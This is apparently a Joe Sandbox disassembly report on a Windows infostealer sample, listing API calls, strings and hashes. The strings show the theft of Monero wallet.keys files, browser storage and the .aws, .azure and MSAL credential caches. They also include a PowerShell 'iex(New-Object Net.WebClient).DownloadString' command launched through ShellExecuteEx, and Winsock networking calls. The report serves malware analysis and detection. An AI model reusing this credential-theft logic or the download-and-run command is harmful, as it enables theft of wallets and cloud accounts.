                                • Instruction ID: ce8d8a12671c42f14b71fed00490002a8af90ce68c1ac4bd2d25c61c1bef5c51
                                • Opcode Fuzzy Hash: e5577a3295d3ad4cfa0acc883bbea48b5a729ad8870921098c4d6d78644d560e
                                • Instruction Fuzzy Hash: F0F1EF70A0025A9BCB21AF76D959AAF77B4AF20345F05816BF845D73A1DB3CDC01CB98
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E43A3
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E43D6
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E43FE
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E4409
                                • lstrlen.KERNEL32(\storage\default\), ref: 004E4414
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E4431
                                • lstrcat.KERNEL32(00000000,\storage\default\), ref: 004E443D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E4466
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E4471
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E4498
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E44D7
                                • lstrcat.KERNEL32(00000000,?), ref: 004E44DF
                                • lstrlen.KERNEL32(00501794), ref: 004E44EA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E4507
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E4513
                                • lstrlen.KERNEL32(.metadata-v2), ref: 004E451E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E453B
                                • lstrcat.KERNEL32(00000000,.metadata-v2), ref: 004E4547
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E456E
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E45A0
                                • GetFileAttributesA.KERNEL32(00000000), ref: 004E45A7
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E4601
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E462A
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E4653
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E467B
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E46AF
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFile
                                • String ID: .metadata-v2$\storage\default\
                                • API String ID: 1033685851-762053450
                                • Opcode ID: 44e78e9e21a6bcb85152c80b88be93d5b5521673388cff16041c277759e5bace
                                • Instruction ID: 467d334d8604b9370a5018d74d3dbf2541c0ca295469a88b48bacae63fe1aeef
                                • Opcode Fuzzy Hash: 44e78e9e21a6bcb85152c80b88be93d5b5521673388cff16041c277759e5bace
                                • Instruction Fuzzy Hash: 5BB1DE70B1025A9BCB21EF76DA59AAF77A8AF50305F00512BF942D7352DB7CDC018B98
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E57D5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004E5804
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E5835
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E585D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E5868
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E5890
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E58C8
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E58D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E58F8
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E592E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E5956
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E5961
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E5988
                                • lstrlen.KERNEL32(00501794), ref: 004E599A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E59B9
                                • lstrcat.KERNEL32(00000000,00501794), ref: 004E59C5
                                • lstrlen.KERNEL32(00CFE028), ref: 004E59D4
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E59F7
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004E5A02
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E5A2C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E5A58
                                • GetFileAttributesA.KERNEL32(00000000), ref: 004E5A5F
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E5AB7
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E5B2D
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E5B56
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E5B89
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E5BB5
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004E5BEF
                                • lstrcpy.KERNEL32(00000000,?), ref: 004E5C4C
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004E5C70
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$AttributesFileFolderPath
                                • String ID:
                                • API String ID: 2428362635-0
                                • Opcode ID: 86e2e83a1c871166aa5f72d4bf32516da25772042020f6eff5bdf3b4e87208b3
                                • Instruction ID: 5c63266623cbcec0dc571b5c3af7f3008f758138c99f9d11533eeb09424e767d
                                • Opcode Fuzzy Hash: 86e2e83a1c871166aa5f72d4bf32516da25772042020f6eff5bdf3b4e87208b3
                                • Instruction Fuzzy Hash: 2302E170A0065ADFCB21EF6AC999AAF77B5AF14309F04812AF80593351CB7CDC41CB98
                                APIs
                                  • Part of subcall function 004D1120: GetProcessHeap.KERNEL32(00000000,00000104), ref: 004D1135
                                  • Part of subcall function 004D1120: RtlAllocateHeap.NTDLL(00000000), ref: 004D113C
                                  • Part of subcall function 004D1120: RegOpenKeyExA.ADVAPI32(80000001,SOFTWARE\monero-project\monero-core,00000000,00020119,?), ref: 004D1159
                                  • Part of subcall function 004D1120: RegQueryValueExA.ADVAPI32(?,wallet_path,00000000,00000000,00000000,000000FF), ref: 004D1173
                                  • Part of subcall function 004D1120: RegCloseKey.ADVAPI32(?), ref: 004D117D
                                • lstrcat.KERNEL32(?,00000000), ref: 004D11C0
                                • lstrlen.KERNEL32(?), ref: 004D11CD
                                • lstrcat.KERNEL32(?,.keys), ref: 004D11E8
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D121F
                                • lstrlen.KERNEL32(00CF9330), ref: 004D122D
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1251
                                • lstrcat.KERNEL32(00000000,00CF9330), ref: 004D1259
                                • lstrlen.KERNEL32(\Monero\wallet.keys), ref: 004D1264
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1288
                                • lstrcat.KERNEL32(00000000,\Monero\wallet.keys), ref: 004D1294
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D12BA
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004D12FF
                                • lstrlen.KERNEL32(00CFDEF0), ref: 004D130E
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1335
                                • lstrcat.KERNEL32(00000000,?), ref: 004D133D
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D1378
                                • lstrcat.KERNEL32(00000000), ref: 004D1385
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004D13AC
                                • CopyFileA.KERNEL32(?,?,00000001), ref: 004D13D5
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D1401
                                • lstrcpy.KERNEL32(00000000,?), ref: 004D143D
                                  • Part of subcall function 004EEDE0: lstrcpy.KERNEL32(00000000,?), ref: 004EEE12
                                • DeleteFileA.KERNEL32(?), ref: 004D1471
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$FileHeap$AllocateCloseCopyDeleteOpenProcessQueryValue
                                • String ID: .keys$\Monero\wallet.keys
                                • API String ID: 2881711868-3586502688
                                • Opcode ID: e3cc38350e0a5ea44e2748eaa2ed889ab6eccf9e111d51634d8cf3e4cfb88fdb
                                • Instruction ID: a99e89f62a2f0429f14f5d75f640bff4bab1dfe077275fff217903339b1499bf
                                • Opcode Fuzzy Hash: e3cc38350e0a5ea44e2748eaa2ed889ab6eccf9e111d51634d8cf3e4cfb88fdb
                                • Instruction Fuzzy Hash: 49A1A171B0021AABDB21EBB5DD99A9F77B8AF14304F00416BF905E7361DB78DD018B98
                                APIs
                                • memset.MSVCRT ref: 004EE740
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 004EE769
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EE79F
                                • lstrcat.KERNEL32(?,00000000), ref: 004EE7AD
                                • lstrcat.KERNEL32(?,\.azure\), ref: 004EE7C6
                                • memset.MSVCRT ref: 004EE805
                                • SHGetFolderPathA.SHELL32(00000000,00000028,00000000,00000000,?), ref: 004EE82D
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EE85F
                                • lstrcat.KERNEL32(?,00000000), ref: 004EE86D
                                • lstrcat.KERNEL32(?,\.aws\), ref: 004EE886
                                • memset.MSVCRT ref: 004EE8C5
                                • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 004EE8F1
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EE920
                                • lstrcat.KERNEL32(?,00000000), ref: 004EE92E
                                • lstrcat.KERNEL32(?,\.IdentityService\), ref: 004EE947
                                • memset.MSVCRT ref: 004EE986
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcat$memset$FolderPathlstrcpy
                                • String ID: *.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache
                                • API String ID: 4067350539-3645552435
                                • Opcode ID: 896df3bd47669fc424bd3e046f88737685751dc8418d1676e12265fe35573749
                                • Instruction ID: a0e8700a9e0b512d685e16441bbb85d731ecc73dfb4451dea8f30449ea8a073f
                                • Opcode Fuzzy Hash: 896df3bd47669fc424bd3e046f88737685751dc8418d1676e12265fe35573749
                                • Instruction Fuzzy Hash: 4F711971A40229ABDB21EB61DC46FED7774EF48300F00449AF7199B2C1DEB89A448B5C
                                APIs
                                • lstrcpy.KERNEL32 ref: 004EABCF
                                • lstrlen.KERNEL32(00CFF5D0), ref: 004EABE5
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EAC0D
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004EAC18
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EAC41
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EAC84
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004EAC8E
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EACB7
                                • lstrlen.KERNEL32(00504AD4), ref: 004EACD1
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EACF3
                                • lstrcat.KERNEL32(00000000,00504AD4), ref: 004EACFF
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EAD28
                                • lstrlen.KERNEL32(00504AD4), ref: 004EAD3A
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EAD5C
                                • lstrcat.KERNEL32(00000000,00504AD4), ref: 004EAD68
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EAD91
                                • lstrlen.KERNEL32(00CFF600), ref: 004EADA7
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EADCF
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004EADDA
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EAE03
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EAE3F
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004EAE49
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EAE6F
                                • lstrlen.KERNEL32(00000000), ref: 004EAE85
                                • lstrcpy.KERNEL32(00000000,00CFF3F0), ref: 004EAEB8
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen
                                • String ID: f
                                • API String ID: 2762123234-1993550816
                                • Opcode ID: fada8abe07c8ee281e3be51e881a9a398c8e5d5d49df871dc6b11925b9e09670
                                • Instruction ID: 5ed64551d427574451efda867aa0a3efc5810fd232c1c912e9357a8c61190d0f
                                • Opcode Fuzzy Hash: fada8abe07c8ee281e3be51e881a9a398c8e5d5d49df871dc6b11925b9e09670
                                • Instruction Fuzzy Hash: 84B17F70A105169BCB21EB6ACD58AAF77B5EF10305F04452BF40197361DB7CED11CB99
                                APIs
                                • LoadLibraryA.KERNEL32(ws2_32.dll,?,004E72A4), ref: 004F47E6
                                • GetProcAddress.KERNEL32(00000000,connect), ref: 004F47FC
                                • GetProcAddress.KERNEL32(00000000,WSAStartup), ref: 004F480D
                                • GetProcAddress.KERNEL32(00000000,getaddrinfo), ref: 004F481E
                                • GetProcAddress.KERNEL32(00000000,htons), ref: 004F482F
                                • GetProcAddress.KERNEL32(00000000,WSACleanup), ref: 004F4840
                                • GetProcAddress.KERNEL32(00000000,recv), ref: 004F4851
                                • GetProcAddress.KERNEL32(00000000,socket), ref: 004F4862
                                • GetProcAddress.KERNEL32(00000000,freeaddrinfo), ref: 004F4873
                                • GetProcAddress.KERNEL32(00000000,closesocket), ref: 004F4884
                                • GetProcAddress.KERNEL32(00000000,send), ref: 004F4895
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: AddressProc$LibraryLoad
                                • String ID: WSACleanup$WSAStartup$closesocket$connect$freeaddrinfo$getaddrinfo$htons$recv$send$socket$ws2_32.dll
                                • API String ID: 2238633743-3087812094
                                • Opcode ID: 7eb51a29f65d0204b36333d0555e114f50812c3a2f2166e67381b01ddac1976b
                                • Instruction ID: dec43d24cdfca69396a814f721a95a827f6595b3809313b6ee2e10078f4fc222
                                • Opcode Fuzzy Hash: 7eb51a29f65d0204b36333d0555e114f50812c3a2f2166e67381b01ddac1976b
                                • Instruction Fuzzy Hash: 49116671952B21EBC7509FB4EC0DA5A3EB8BB097053088A1AF6D1D22A1FEFC4440DF59
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004EBE53
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004EBE86
                                • lstrlen.KERNEL32(-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 004EBE91
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EBEB1
                                • lstrcat.KERNEL32(00000000,-nop -c "iex(New-Object Net.WebClient).DownloadString('), ref: 004EBEBD
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EBEE0
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004EBEEB
                                • lstrlen.KERNEL32(')"), ref: 004EBEF6
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EBF13
                                • lstrcat.KERNEL32(00000000,')"), ref: 004EBF1F
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EBF46
                                • lstrlen.KERNEL32(C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 004EBF66
                                • lstrcpy.KERNEL32(00000000,?), ref: 004EBF88
                                • lstrcat.KERNEL32(00000000,C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe), ref: 004EBF94
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004EBFBA
                                • ShellExecuteEx.SHELL32(?), ref: 004EC00C
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.2238610735.00000000004D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 004D0000, based on PE: true
                                 • Associated: 00000000.00000002.2238593413.00000000004D0000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000507000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000055E000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000566000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.000000000057F000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238610735.0000000000708000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238803532.000000000071A000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.000000000071C000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000008B1000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.0000000000989000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009B2000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009BA000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2238819672.00000000009C8000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239137418.00000000009C9000.00000080.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239268030.0000000000B6B000.00000040.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.2239286916.0000000000B6C000.00000080.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_4d0000_file.jbxd
                                Yara matches
                                Similarity
                                • API ID: lstrcpy$lstrcat$lstrlen$ExecuteShell
                                • String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                • API String ID: 4016326548-898575020
                                • Opcode ID: e707b5f3928e54911087574c6ecd5da00956777317e819579f498669884a0e4a
                                • Instruction ID: 111589c46d998e0098898580a026eb62f7938003bace636f1d9340dbe407e94a
                                • Opcode Fuzzy Hash: e707b5f3928e54911087574c6ecd5da00956777317e819579f498669884a0e4a
                                • Instruction Fuzzy Hash: CE61D370B1025A9BCB21AFBA8D996AF7BA8EF14305F04552BF505D3352DB7CC8018B99
                                APIs
                                • lstrcpy.KERNEL32(00000000,004FCFEC), ref: 004F184F
                                • lstrlen.KERNEL32(00CE6D70), ref: 004F1860
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F1887
                                • lstrcat.KERNEL32(00000000,00000000), ref: 004F1892
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F18C1
                                • lstrlen.KERNEL32(00504FA0), ref: 004F18D3
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F18F4
                                • lstrcat.KERNEL32(00000000,00504FA0), ref: 004F1900
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F192F
                                • lstrlen.KERNEL32(00CE6D40), ref: 004F1945
                                • lstrcpy.KERNEL32(00000000,00000000), ref: 004F196C
